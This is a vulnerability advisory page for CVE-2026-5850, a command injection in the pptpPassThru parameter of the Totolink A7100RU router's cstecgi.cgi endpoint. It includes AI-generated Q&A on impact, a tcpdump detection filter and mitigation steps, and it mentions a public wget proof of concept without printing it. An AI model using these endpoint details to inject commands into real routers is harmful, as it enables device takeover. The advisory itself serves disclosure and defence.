CVE-2026-5850
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-09
Last updated on: 2026-04-09
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The CVE-2026-5850 vulnerability allows remote attackers to execute arbitrary OS commands on the affected Totolink A7100RU router. This can lead to unauthorized access, data manipulation, or disruption of services.
Such unauthorized access and control over network devices can compromise the confidentiality, integrity, and availability of data, which are core principles in standards like GDPR and HIPAA.
Therefore, exploitation of this vulnerability could result in violations of these regulations by exposing personal or sensitive data, failing to protect data adequately, or causing service interruptions.
Can you explain this vulnerability to me?
CVE-2026-5850 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI script /cgi-bin/cstecgi.cgi, specifically in the function that handles the parameter pptpPassThru.
An attacker can send a specially crafted request with malicious content in the pptpPassThru parameter, which is then passed to a system command execution function without proper sanitization. This allows the attacker to execute arbitrary operating system commands remotely on the router.
A proof of concept shows that commands like downloading files via wget can be executed remotely, confirming the severity and exploitability of this vulnerability.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary commands on the affected router without authentication.
- Attackers can take full control of the router, potentially altering its configuration or using it as a foothold to attack other devices on the network.
- It can lead to data interception, network disruption, or the installation of malicious software.
- Because the exploit is publicly available, the risk of exploitation is high.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST requests to the endpoint /cgi-bin/cstecgi.cgi that include the parameter pptpPassThru with unusual or command-like values.
A practical detection method is to capture and analyze HTTP traffic targeting the Totolink A7100RU router, specifically looking for POST requests containing the pptpPassThru parameter with injected commands such as wget or other shell commands.
Example command to detect such attempts using tcpdump on the network interface connected to the router:
- tcpdump -A -s 0 'tcp port 80 and (((ip dst <router_ip>) and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354)))'
This command captures HTTP POST requests to the router's IP address. You can then inspect the payload for the pptpPassThru parameter.
Alternatively, using curl or similar tools to test the vulnerability by sending a crafted POST request with a benign command in pptpPassThru can confirm if the router is vulnerable.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the router's web interface, especially the /cgi-bin/cstecgi.cgi endpoint, to trusted networks only.
Disable or block remote management features if enabled, to prevent remote exploitation.
Monitor network traffic for suspicious POST requests containing the pptpPassThru parameter and block or alert on such activity.
If available, update the router firmware to a version that patches this vulnerability.
As a temporary workaround, consider implementing firewall rules to block HTTP POST requests to /cgi-bin/cstecgi.cgi or filter out requests containing pptpPassThru.